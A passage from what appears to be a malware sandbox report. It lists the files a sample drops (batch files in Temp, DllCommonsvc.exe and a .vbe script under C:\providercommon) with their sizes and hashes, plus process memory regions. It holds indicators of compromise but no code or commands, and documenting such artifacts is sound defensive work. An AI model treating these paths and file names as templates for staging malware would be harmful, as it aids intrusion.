                                        192B

                                        MD5

                                        2f4a2a554e5f442963575842b8ff14d3

                                        SHA1

                                        21c04a496cd8d32fc3a25c63170da77939561f9c

                                        SHA256

                                        ebcd74062fb4a9aebda7027663df3d1d0e733438b81a73607a5592dec18e8e32

                                        SHA512

                                        c9d99979ec81b5644c0b7eab9380d1b7297b1447b451a57a9901abfc2c9433c78192bbd1aaddb568edeab345fe731e267e7b73b51f3d081b394e7e18e2e56e07

                                      • C:\Users\Admin\AppData\Local\Temp\rHhDMS4c5i.bat

                                        Filesize

                                        192B

                                        MD5

                                        2b49a1fb0c9e9f197668c856a89a06da

                                        SHA1

                                        7ce7e1ee80be9920902301158aa94391fca11c4d

                                        SHA256

                                        b17c1bc15ffb495af88389a33051ff77624730edf4f76ebe28a75e685b84d915

                                        SHA512

                                        30d9e5a02ca24528e41f37f9ea44daa9a10dda9bf0d256f1f654d4ec54383dd5707b93dc2e37df4d1d7858daa8e00ec57adad36c1082473c545af2e9c047199b

                                      • C:\Users\Admin\AppData\Local\Temp\tDjG3X7WPV.bat

                                        Filesize

                                        192B

                                        MD5

                                        45d0d97df7543cac9d042a069b893964

                                        SHA1

                                        e9b8e3ad42ad8767df63876f7501a81d2fdfbc71

                                        SHA256

                                        61faedaca1cf224d5d80f3c6d65dee8c9ac0019d3f3534b7cae67164fc5426e0

                                        SHA512

                                        43bdf556bc2d484b0706d48cec8a7f9b1d27f1db77036af9540a1b7678248a5344fcae3f0c75c7c1965edd8f89309bc3c7ca40c60adf05233efe9c7a76948944

                                      • C:\providercommon\1zu9dW.bat

                                        Filesize

                                        36B

                                        MD5

                                        6783c3ee07c7d151ceac57f1f9c8bed7

                                        SHA1

                                        17468f98f95bf504cc1f83c49e49a78526b3ea03

                                        SHA256

                                        8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

                                        SHA512

                                        c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

                                      • C:\providercommon\DllCommonsvc.exe

                                        Filesize

                                        1.0MB

                                        MD5

                                        bd31e94b4143c4ce49c17d3af46bcad0

                                        SHA1

                                        f8c51ff3ff909531d9469d4ba1bbabae101853ff

                                        SHA256

                                        b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

                                        SHA512

                                        f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

                                      • C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

                                        Filesize

                                        197B

                                        MD5

                                        8088241160261560a02c84025d107592

                                        SHA1

                                        083121f7027557570994c9fc211df61730455bb5

                                        SHA256

                                        2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

                                        SHA512

                                        20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

                                      • memory/548-17-0x0000000002B90000-0x0000000002B9C000-memory.dmp

                                        Filesize

                                        48KB

                                      • memory/548-13-0x0000000000940000-0x0000000000A50000-memory.dmp

                                        Filesize

                                        1.1MB

                                      • memory/548-12-0x00007FF9952A3000-0x00007FF9952A5000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/548-14-0x0000000002B60000-0x0000000002B72000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/548-15-0x0000000002BA0000-0x0000000002BAC000-memory.dmp

                                        Filesize

                                        48KB

                                      • memory/548-16-0x0000000002B70000-0x0000000002B7C000-memory.dmp

                                        Filesize

                                        48KB

                                      • memory/728-59-0x0000023AB2CF0000-0x0000023AB2D12000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/940-213-0x000000001ADF0000-0x000000001AE02000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/4140-206-0x00000000013F0000-0x0000000001402000-memory.dmp

                                        Filesize

                                        72KB

                                      • memory/4556-220-0x000000001AFF0000-0x000000001B002000-memory.dmp

                                        Filesize

                                        72KB

                                      We care about your privacy.

                                      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.